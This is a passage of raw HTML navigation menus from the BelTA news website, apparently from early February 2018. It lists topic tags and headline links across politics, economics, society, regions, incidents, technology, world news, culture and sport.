		                                	                	                                                <a href="http://www.belta.by/politics/view/respublika-koreja-zainteresovana-v-ustanovlenii-bezvizovogo-rezhima-s-belarusjju-287896-2018/"  title="Республика Корея заинтересована в установлении безвизового режима с Беларусью" class="fp_rb_news_title">
                    Республика Корея заинтересована в установлении безвизового режима с Беларусью
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/politics/view/mezhmidovskie-konsultatsii-po-razvitiju-sotrudnichestva-stran-sng-projdut-7-8-fevralja-v-minske-287890-2018/"  title="Межмидовские консультации по развитию сотрудничества стран СНГ пройдут 7-8 февраля в Минске" class="fp_rb_news_title">
                    Межмидовские консультации по развитию сотрудничества стран СНГ пройдут 7-8 февраля в Минске
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/vybory-deputatov-v-mestnye-sovety-322/" title="Выборы депутатов в местные Советы">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_816251.jpg" alt="Выборы депутатов в местные Советы" title="Выборы депутатов в местные Советы"/></span>
            
	            <span class="lastSuzetHMenuTitle">Выборы депутатов в местные Советы</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/zasedanie-kontaktnoj-gruppy-po-ukraine-85/" title="Заседание контактной группы по Украине">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_509743.jpg" alt="Заседание контактной группы по Украине" title="Заседание контактной группы по Украине"/></span>
            
	            <span class="lastSuzetHMenuTitle">Заседание контактной группы по Украине</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/pjatidnevnyj-bezvizovyj-rezhim-dlja-inostrantsev-v-belarusi-265/" title="Пятидневный безвизовый режим для иностранцев в Беларуси">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_602461.jpg" alt="Пятидневный безвизовый режим для иностранцев в Беларуси" title="Пятидневный безвизовый режим для иностранцев в Беларуси"/></span>
            
	            <span class="lastSuzetHMenuTitle">Пятидневный безвизовый режим для иностранцев в Беларуси</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/economics/" title="Экономика">Экономика</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/55" title="агрогородки">агрогородки</a></div>
           
            <div><a href="/search/findTags/1015" title="атомная энергетика">атомная энергетика</a></div>
           
            <div><a href="/search/findTags/1017" title="аукцион">аукцион</a></div>
           
            <div><a href="/search/findTags/1013" title="АЭС">АЭС</a></div>
           
            <div><a href="/search/findTags/1006" title="базовая величина">базовая величина</a></div>
           
            <div><a href="/search/findTags/1005" title="банки">банки</a></div>
           
            <div><a href="/search/findTags/992" title="безработица">безработица</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/economics/view/rusyj-orientiruet-minselhozprod-na-proizvodstvo-produktsii-s-vysokoj-dobavlennoj-stoimostjju-288045-2018/"  title="Русый ориентирует Минсельхозпрод на производство продукции с высокой добавленной стоимостью" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000021_1517841054_small.jpg" alt="Михаил Русый. Фото из архива" title="Михаил Русый. Фото из архива"/>
                    </a>
                                <a href="http://www.belta.by/economics/view/rusyj-orientiruet-minselhozprod-na-proizvodstvo-produktsii-s-vysokoj-dobavlennoj-stoimostjju-288045-2018/"  title="Русый ориентирует Минсельхозпрод на производство продукции с высокой добавленной стоимостью" class="fp_rb_news_title">
                    Русый ориентирует Минсельхозпрод на производство продукции с высокой добавленной стоимостью
                     
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/economics/view/srochnye-rublevye-depozity-fizlits-v-2017-godu-v-belarusi-vyrosli-na-132-288021-2018/"  title="Срочные рублевые депозиты физлиц в 2017 году в Беларуси выросли на 13,2%" class="fp_rb_news_title">
                    Срочные рублевые депозиты физлиц в 2017 году в Беларуси выросли на 13,2%
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/economics/view/pervyj-broker-iz-kazahstana-akkreditovan-na-butb-288002-2018/"  title="Первый брокер из Казахстана аккредитован на БУТБ" class="fp_rb_news_title">
                    Первый брокер из Казахстана аккредитован на БУТБ
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/economics/view/eksport-belorusskoj-selhozproduktsii-v-2017-godu-vozros-na-15-287982-2018/"  title="Экспорт белорусской сельхозпродукции в 2017 году возрос на 15%" class="fp_rb_news_title">
                    Экспорт белорусской сельхозпродукции в 2017 году возрос на 15%
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/economics/view/belarus-i-gruzija-prorabatyvajut-alternativnye-marshruty-dlja-postavok-produktsii-287901-2018/"  title="Беларусь и Грузия прорабатывают альтернативные маршруты для поставок продукции" class="fp_rb_news_title">
                    Беларусь и Грузия прорабатывают альтернативные маршруты для поставок продукции
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/industrialnyj-park-velikij-kamen-44/" title="Индустриальный парк &quot;Великий камень&quot;">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_844032.jpg" alt="Индустриальный парк &quot;Великий камень&quot;" title="Индустриальный парк &quot;Великий камень&quot;"/></span>
            
	            <span class="lastSuzetHMenuTitle">Индустриальный парк "Великий камень"</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/stroitelstvo-aes-v-belarusi-32/" title="Строительство АЭС в Беларуси">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_422497.jpg" alt="Строительство АЭС в Беларуси" title="Строительство АЭС в Беларуси"/></span>
            
	            <span class="lastSuzetHMenuTitle">Строительство АЭС в Беларуси</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/postavki-belorusskogo-prodovolstvija-v-rossiju-259/" title="Поставки белорусского продовольствия в Россию">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_848173.jpg" alt="Поставки белорусского продовольствия в Россию" title="Поставки белорусского продовольствия в Россию"/></span>
            
	            <span class="lastSuzetHMenuTitle">Поставки белорусского продовольствия в Россию</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/society/" title="Общество">Общество</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/1300" title="II Съезд ученых Беларуси">II Съезд ученых Беларуси</a></div>
           
            <div><a href="/search/findTags/69" title="абитуриенты">абитуриенты</a></div>
           
            <div><a href="/search/findTags/56" title="агротуризм">агротуризм</a></div>
           
            <div><a href="/search/findTags/1024" title="аренда жилья">аренда жилья</a></div>
           
            <div><a href="/search/findTags/1203" title="Белкоопсоюз">Белкоопсоюз</a></div>
           
            <div><a href="/search/findTags/949" title="вакцинация">вакцинация</a></div>
           
            <div><a href="/search/findTags/934" title="ветераны">ветераны</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/society/view/elektronnye-jarmarki-vakansij-planiruetsja-provodit-v-belarusi-288030-2018/"  title="Электронные ярмарки вакансий планируется проводить в Беларуси" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000022_1517837123_small.jpg" alt="Фото из архива" title="Фото из архива"/>
                    </a>
                                <a href="http://www.belta.by/society/view/elektronnye-jarmarki-vakansij-planiruetsja-provodit-v-belarusi-288030-2018/"  title="Электронные ярмарки вакансий планируется проводить в Беларуси" class="fp_rb_news_title">
                    Электронные ярмарки вакансий планируется проводить в Беларуси
                     
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/society/view/investitsii-nuzhno-privlekat-v-pervuju-ochered-v-regiony-s-naprjazhennoj-situatsiej-na-rynke-truda-288053-2018/"  title="Инвестиции нужно привлекать в первую очередь в регионы с напряженной ситуацией на рынке труда - Сиренко" class="fp_rb_news_title">
                    Инвестиции нужно привлекать в первую очередь в регионы с напряженной ситуацией на рынке труда - Сиренко
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/society/view/gknt-nachinaet-priem-zajavok-na-uchastie-v-respublikanskom-konkurse-innovatsionnyh-proektov-288050-2018/"  title="ГКНТ начинает прием заявок на участие в республиканском конкурсе инновационных проектов" class="fp_rb_news_title">
                    ГКНТ начинает прием заявок на участие в республиканском конкурсе инновационных проектов
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/society/view/zakon-o-personalnyh-dannyh-planiruetsja-podgotovit-v-2018-godu-288044-2018/"  title="Закон о персональных данных планируется подготовить в 2018 году" class="fp_rb_news_title">
                    Закон о персональных данных планируется подготовить в 2018 году
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/society/view/telefony-psihologicheskoj-pomoschi-v-belarusi-dejstvujut-vo-vseh-oblastnyh-tsentrah-i-minske-288039-2018/"  title="Телефоны психологической помощи в Беларуси действуют во всех областных центрах и Минске" class="fp_rb_news_title">
                    Телефоны психологической помощи в Беларуси действуют во всех областных центрах и Минске
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/sodejstvie-zanjatosti-naselenija-333/" title="Содействие занятости населения">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_332207.jpg" alt="Содействие занятости населения" title="Содействие занятости населения"/></span>
            
	            <span class="lastSuzetHMenuTitle">Содействие занятости населения</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/k-100-letiju-belta-naviny-skladajuts-gistoryju-331/" title="К 100-летию БЕЛТА: &quot;Навiны складаюць гiсторыю&quot;">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_849814.jpg" alt="К 100-летию БЕЛТА: &quot;Навiны складаюць гiсторыю&quot;" title="К 100-летию БЕЛТА: &quot;Навiны складаюць гiсторыю&quot;"/></span>
            
	            <span class="lastSuzetHMenuTitle">К 100-летию БЕЛТА: "Навiны складаюць гiсторыю"</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/sotsialnoe-gosudarstvo-v-dejstvii-279/" title="Социальное государство в работе">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_31016.jpg" alt="Социальное государство в работе" title="Социальное государство в работе"/></span>
            
	            <span class="lastSuzetHMenuTitle">Социальное государство в работе</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/regions/" title="Регионы">Регионы</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/582" title="Могилевская область">Могилевская область</a></div>
           
            <div><a href="/search/findTags/591" title="Минская область">Минская область</a></div>
           
            <div><a href="/search/findTags/841" title="Гродненская область">Гродненская область</a></div>
           
            <div><a href="/search/findTags/871" title="Гомельская область">Гомельская область</a></div>
           
            <div><a href="/search/findTags/921" title="Витебская область">Витебская область</a></div>
           
            <div><a href="/search/findTags/953" title="Брестская область">Брестская область</a></div>
           
            <div><a href="/search/findTags/955" title="Брестский облисполком">Брестский облисполком</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/regions/view/reportazh-glavnoe-ljudjam-pomoch-288058-2018/"  title="РЕПОРТАЖ: Главное - людям помочь" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000023_1517848831_small.jpg" alt="" title=""/>
                    </a>
                                <a href="http://www.belta.by/regions/view/reportazh-glavnoe-ljudjam-pomoch-288058-2018/"  title="РЕПОРТАЖ: Главное - людям помочь" class="fp_rb_news_title">
                    РЕПОРТАЖ: Главное - людям помочь
                     
                    <span class="with_photo"></span>                </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/regions/view/vrp-minska-v-2017-godu-uvelichilsja-na-3-288013-2018/"  title="ВРП Минска в 2017 году увеличился на 3%" class="fp_rb_news_title">
                    ВРП Минска в 2017 году увеличился на 3%
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/regions/view/v-spiski-izbiratelej-dlja-golosovanija-v-vitebskoj-oblasti-vkljucheny-okolo-867-tys-grazhdan-287970-2018/"  title="В списки избирателей для голосования в Витебской области включены около 867 тыс. граждан" class="fp_rb_news_title">
                    В списки избирателей для голосования в Витебской области включены около 867 тыс. граждан
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/regions/view/pasport-turista-na-treh-jazykah-predstavili-v-grodnenskoj-oblasti-287955-2018/"  title="&quot;Паспорт туриста&quot; на трех языках представили в Гродненской области" class="fp_rb_news_title">
                    "Паспорт туриста" на трех языках представили в Гродненской области
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/regions/view/v-gomele-i-mozyre-za-sutki-vypala-dekadnaja-norma-snega-287952-2018/"  title="В Гомеле и Мозыре за сутки выпала декадная норма снега" class="fp_rb_news_title">
                    В Гомеле и Мозыре за сутки выпала декадная норма снега
                     
                                    </a>
                            </div>
            
    </div>



        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/incident/" title="Происшествия">Происшествия</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/60" title="автокатастрофа">автокатастрофа</a></div>
           
            <div><a href="/search/findTags/944" title="вандализм">вандализм</a></div>
           
            <div><a href="/search/findTags/929" title="взяточничество">взяточничество</a></div>
           
            <div><a href="/search/findTags/710" title="киберпреступность">киберпреступность</a></div>
           
            <div><a href="/search/findTags/694" title="контрабанда">контрабанда</a></div>
           
            <div><a href="/search/findTags/684" title="кража">кража</a></div>
           
            <div><a href="/search/findTags/572" title="мошенничество">мошенничество</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/incident/view/gospogrankomitet-opublikoval-video-top-5-proisshestvij-na-granitse-v-2017-godu-287950-2018/"  title="Госпогранкомитет опубликовал видео топ-5 происшествий на границе в 2017 году" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000024_1517819323_small.jpg" alt="Фото из архива" title="Фото из архива"/>
                    </a>
                                <a href="http://www.belta.by/incident/view/gospogrankomitet-opublikoval-video-top-5-proisshestvij-na-granitse-v-2017-godu-287950-2018/"  title="Госпогранкомитет опубликовал видео топ-5 происшествий на границе в 2017 году" class="fp_rb_news_title">
                    Госпогранкомитет опубликовал видео топ-5 происшествий на границе в 2017 году
                    <span class="with_video"></span> 
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/incident/view/paviljon-s-bytovoj-himiej-gorel-na-mini-rynke-v-pinske-288067-2018/"  title="Павильон с бытовой химией горел на мини-рынке в Пинске" class="fp_rb_news_title">
                    Павильон с бытовой химией горел на мини-рынке в Пинске
                     
                    <span class="with_photo"></span>                </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/incident/view/v-gluske-legkovushka-vyletela-na-trotuar-i-sbila-dvuh-peshehodov-288062-2018/"  title="В Глуске легковушка вылетела на тротуар и сбила двух пешеходов" class="fp_rb_news_title">
                    В Глуске легковушка вылетела на тротуар и сбила двух пешеходов
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/incident/view/v-minske-zaderzhali-serijnogo-domushnika-288055-2018/"  title="В Минске задержали серийного домушника" class="fp_rb_news_title">
                    В Минске задержали серийного домушника
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/incident/view/glavnyj-inzhener-mzkt-zaderzhan-za-vzjatku-288037-2018/"  title="Главный инженер МЗКТ задержан за взятку" class="fp_rb_news_title">
                    Главный инженер МЗКТ задержан за взятку
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/borba-s-nezakonnym-oborotom-narkotikov-36/" title="Борьба с незаконным оборотом наркотиков">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_170418.jpg" alt="Борьба с незаконным оборотом наркотиков" title="Борьба с незаконным оборотом наркотиков"/></span>
            
	            <span class="lastSuzetHMenuTitle">Борьба с незаконным оборотом наркотиков</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/podrobnosti-rezonansnyh-del-belorusskoj-militsii-277/" title="Подробности резонансных дел белорусской милиции">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_786926.jpg" alt="Подробности резонансных дел белорусской милиции" title="Подробности резонансных дел белорусской милиции"/></span>
            
	            <span class="lastSuzetHMenuTitle">Подробности резонансных дел белорусской милиции</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/tech/" title="Технологии">Технологии</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/986" title="Белтелеком">Белтелеком</a></div>
           
            <div><a href="/search/findTags/891" title="гаджеты">гаджеты</a></div>
           
            <div><a href="/search/findTags/710" title="киберпреступность">киберпреступность</a></div>
           
            <div><a href="/search/findTags/339" title="сайты">сайты</a></div>
           
            <div><a href="/search/findTags/287" title="софт">софт</a></div>
           
            <div><a href="/search/findTags/283" title="социальные сети">социальные сети</a></div>
           
            <div><a href="/search/findTags/244" title="телевидение">телевидение</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/tech/view/big-data-i-innovatsionnye-servisy-dlja-biznesa-kompanija-delovaja-set-oboznachila-strategicheskie-288033-2018/"  title="Big Data и инновационные сервисы для бизнеса: компания &quot;Деловая сеть&quot; обозначила стратегические приоритеты" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000025_1517838106_small.jpg" alt="" title=""/>
                    </a>
                                <a href="http://www.belta.by/tech/view/big-data-i-innovatsionnye-servisy-dlja-biznesa-kompanija-delovaja-set-oboznachila-strategicheskie-288033-2018/"  title="Big Data и инновационные сервисы для бизнеса: компания &quot;Деловая сеть&quot; обозначила стратегические приоритеты" class="fp_rb_news_title">
                    Big Data и инновационные сервисы для бизнеса: компания "Деловая сеть" обозначила стратегические приоритеты
                     
                    <span class="with_photo"></span>                </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/tech/view/u-iphone-x-obnaruzhili-novyj-defekt-288068-2018/"  title="У iPhone X обнаружили новый дефект" class="fp_rb_news_title">
                    У iPhone X обнаружили новый дефект
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/tech/view/boeing-predstavil-samolet-novogo-pokolenija-iz-serii-737-max-288059-2018/"  title="Boeing представил самолет нового поколения из серии 737 MAX" class="fp_rb_news_title">
                    Boeing представил самолет нового поколения из серии 737 MAX
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/tech/view/kitaj-razrabotal-bespilotnyj-monorels-sposobnyj-vyderzhivat-40-gradusnye-morozy-288029-2018/"  title="Китай разработал беспилотный монорельс, способный выдерживать 40-градусные морозы" class="fp_rb_news_title">
                    Китай разработал беспилотный монорельс, способный выдерживать 40-градусные морозы
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/tech/view/sk-obraschaet-vnimanie-na-pojavlenie-vredonosnogo-po-dlja-skrytogo-majninga-kriptovaljut-288024-2018/"  title="СК обращает внимание на появление вредоносного ПО для скрытого майнинга криптовалют" class="fp_rb_news_title">
                    СК обращает внимание на появление вредоносного ПО для скрытого майнинга криптовалют
                    <span class="with_video"></span> 
                                    </a>
                            </div>
            
    </div>



        </div>
    </div>
            </div>
        <div class="menu_col">
                	
                    <div class="menu_item menu_item_selected"><a   href="http://www.belta.by/world/" title="В мире">В мире</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/71" title="Азербайджан">Азербайджан</a></div>
           
            <div><a href="/search/findTags/792" title="ЕС">ЕС</a></div>
           
            <div><a href="/search/findTags/70" title="Китай">Китай</a></div>
           
            <div><a href="/search/findTags/724" title="Казахстан">Казахстан</a></div>
           
            <div><a href="/search/findTags/652" title="Литва">Литва</a></div>
           
            <div><a href="/search/findTags/352" title="Россия">Россия</a></div>
           
            <div><a href="/search/findTags/204" title="Украина">Украина</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/world/view/sugroby-do-55-sm-snegopad-v-moskve-stal-silnejshim-za-100-let-288038-2018/"  title="Сугробы до 55 см. Снегопад в Москве стал сильнейшим за 100 лет" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000026_1517839728_small.jpg" alt="" title=""/>
                    </a>
                                <a href="http://www.belta.by/world/view/sugroby-do-55-sm-snegopad-v-moskve-stal-silnejshim-za-100-let-288038-2018/"  title="Сугробы до 55 см. Снегопад в Москве стал сильнейшим за 100 лет" class="fp_rb_news_title">
                    Сугробы до 55 см. Снегопад в Москве стал сильнейшим за 100 лет
                     
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/world/view/na-maldivah-vveli-chrezvychajnoe-polozhenie-288072-2018/"  title="На Мальдивах ввели чрезвычайное положение" class="fp_rb_news_title">
                    На Мальдивах ввели чрезвычайное положение
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/world/view/muzhchina-s-holodnym-oruzhiem-pytalsja-vojti-v-zdanie-administratsii-prezidenta-irana-288009-2018/"  title="Мужчина с холодным оружием пытался войти в здание администрации президента Ирана" class="fp_rb_news_title">
                    Мужчина с холодным оружием пытался войти в здание администрации президента Ирана
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/world/view/dlja-balkanskih-stran-ne-budet-avtomaticheskogo-vstuplenija-v-es-kabmin-frg-288006-2018/"  title="Для балканских стран не будет автоматического вступления в ЕС - кабмин ФРГ" class="fp_rb_news_title">
                    Для балканских стран не будет автоматического вступления в ЕС - кабмин ФРГ
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/world/view/v-japonii-voennyj-vertolet-upal-na-zhiloj-dom-oba-pilota-pogibli-287999-2018/"  title="В Японии военный вертолет упал на жилой дом, оба пилота погибли" class="fp_rb_news_title">
                    В Японии военный вертолет упал на жилой дом, оба пилота погибли
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/novosti-iz-kitaja-228/" title="Жэньминь Жибао: новости из Китая">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_591484.jpg" alt="Жэньминь Жибао: новости из Китая" title="Жэньминь Жибао: новости из Китая"/></span>
            
	            <span class="lastSuzetHMenuTitle">Жэньминь Жибао: новости из Китая</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/naplyv-migrantov-v-evropu-105/" title="Наплыв мигрантов в Европу">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_147106.jpg" alt="Наплыв мигрантов в Европу" title="Наплыв мигрантов в Европу"/></span>
            
	            <span class="lastSuzetHMenuTitle">Наплыв мигрантов в Европу</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/vyhod-velikobritanii-iz-es-213/" title="Выход Великобритании из ЕС">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_44310.jpg" alt="Выход Великобритании из ЕС" title="Выход Великобритании из ЕС"/></span>
            
	            <span class="lastSuzetHMenuTitle">Выход Великобритании из ЕС</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/culture/" title="Культура">Культура</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/1016" title="архитектура">архитектура</a></div>
           
            <div><a href="/search/findTags/1014" title="афиша">афиша</a></div>
           
            <div><a href="/search/findTags/1008" title="балет">балет</a></div>
           
            <div><a href="/search/findTags/1305" title="гороскоп">гороскоп</a></div>
           
            <div><a href="/search/findTags/821" title="Детское Евровидение">Детское Евровидение</a></div>
           
            <div><a href="/search/findTags/779" title="живопись">живопись</a></div>
           
            <div><a href="/search/findTags/514" title="опера">опера</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/culture/view/fotofakt-jubilejnaja-vystavka-leonida-schemeleva-otkrylas-v-natsionalnom-hudozhestvennom-muzee-288056-2018/"  title="ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000027_1517847384_small.jpg" alt="Леонид Щемелев" title="Леонид Щемелев"/>
                    </a>
                                <a href="http://www.belta.by/culture/view/fotofakt-jubilejnaja-vystavka-leonida-schemeleva-otkrylas-v-natsionalnom-hudozhestvennom-muzee-288056-2018/"  title="ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее" class="fp_rb_news_title">
                    ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее
                     
                    <span class="with_photo"></span>                </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/culture/view/depeche-mode-vystupit-v-minske-13-fevralja-288048-2018/"  title="Depeche Mode выступит в Минске 13 февраля" class="fp_rb_news_title">
                    Depeche Mode выступит в Минске 13 февраля
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/culture/view/izvestnyj-portret-kolasa-kisti-stelmashonka-pokazhut-na-vystavke-k-90-letiju-so-dnja-rozhdenija-288040-2018/"  title="Известный портрет Коласа кисти Стельмашонка покажут на выставке к 90-летию со дня рождения художника" class="fp_rb_news_title">
                    Известный портрет Коласа кисти Стельмашонка покажут на выставке к 90-летию со дня рождения художника
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/culture/view/lebedinoe-ozero-belorusskogo-bolshogo-uvidjat-v-meksike-287889-2018/"  title="&quot;Лебединое озеро&quot; белорусского Большого увидят в Мексике" class="fp_rb_news_title">
                    "Лебединое озеро" белорусского Большого увидят в Мексике
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/culture/view/forum-eksperimentalnyh-teatrov-plastforma-minsk-projdet-13-19-fevralja-287883-2018/"  title="Форум экспериментальных театров &quot;ПлаSтформа Минск&quot; пройдет 13-19 февраля" class="fp_rb_news_title">
                    Форум экспериментальных театров "ПлаSтформа Минск" пройдет 13-19 февраля
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/500-letie-belorusskogo-knigopechatanija-271/" title="500-летие белорусского книгопечатания">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_484044.jpg" alt="500-летие белорусского книгопечатания" title="500-летие белорусского книгопечатания"/></span>
            
	            <span class="lastSuzetHMenuTitle">500-летие белорусского книгопечатания</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/sport/" title="Спорт">Спорт</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/52" title="Азаренко">Азаренко</a></div>
           
            <div><a href="/search/findTags/1003" title="баскетбол">баскетбол</a></div>
           
            <div><a href="/search/findTags/999" title="БАТЭ">БАТЭ</a></div>
           
            <div><a href="/search/findTags/940" title="велоспорт">велоспорт</a></div>
           
            <div><a href="/search/findTags/881" title="гимнастика">гимнастика</a></div>
           
            <div><a href="/search/findTags/807" title="Домрачева">Домрачева</a></div>
           
            <div><a href="/search/findTags/1047" title="Евроигры">Евроигры</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/sport/view/anastasija-veremeenko-i-elena-levchenko-pribyli-v-trenirovochnyj-lager-basketbolnoj-sbornoj-288032-2018/"  title="Анастасия Веремеенко и Елена Левченко прибыли в тренировочный лагерь баскетбольной сборной" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000028_1517838145_small.jpg" alt="Елена Левченко. Фото из архива" title="Елена Левченко. Фото из архива"/>
                    </a>
                                <a href="http://www.belta.by/sport/view/anastasija-veremeenko-i-elena-levchenko-pribyli-v-trenirovochnyj-lager-basketbolnoj-sbornoj-288032-2018/"  title="Анастасия Веремеенко и Елена Левченко прибыли в тренировочный лагерь баскетбольной сборной" class="fp_rb_news_title">
                    Анастасия Веремеенко и Елена Левченко прибыли в тренировочный лагерь баскетбольной сборной
                     
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
